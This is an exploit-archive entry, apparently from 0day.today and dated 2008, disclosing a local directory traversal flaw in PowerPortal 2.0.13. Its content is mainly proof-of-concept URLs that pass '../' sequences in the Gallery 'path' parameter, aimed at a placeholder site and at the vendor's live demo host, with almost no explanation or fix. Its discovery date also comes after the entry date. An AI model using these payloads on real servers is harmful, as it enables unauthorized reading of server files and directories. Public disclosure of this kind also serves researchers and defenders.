id: 3786
date: 09/26/2008
title: PowerPortal 2.0.13 (path) Local Directory Traversal Vulnerability
author: r45c4l
cves: 

=================================================================
PowerPortal 2.0.13 (path) Local Directory Traversal Vulnerability
=================================================================


################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
################################################################ 
# 
# Author: r45c4l 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title:  PowerPortal 2 Local Directory Traversal Vulnerability
#
# VEndor: http://www.powerportal2.com/
# 
#
###########################################################
#
# d0rk: n/a
#
###########################################################
 
     POC :- 
	
	http://site.com/index/Gallery/?path=../../../../../../../       
   
     Live Demo: 
	
	http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../

	http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../dev
 
###########################################################
#
#  Bug discovered : 28 Sep.2008
###########################################################



#  0day.today [2023-03-23]  #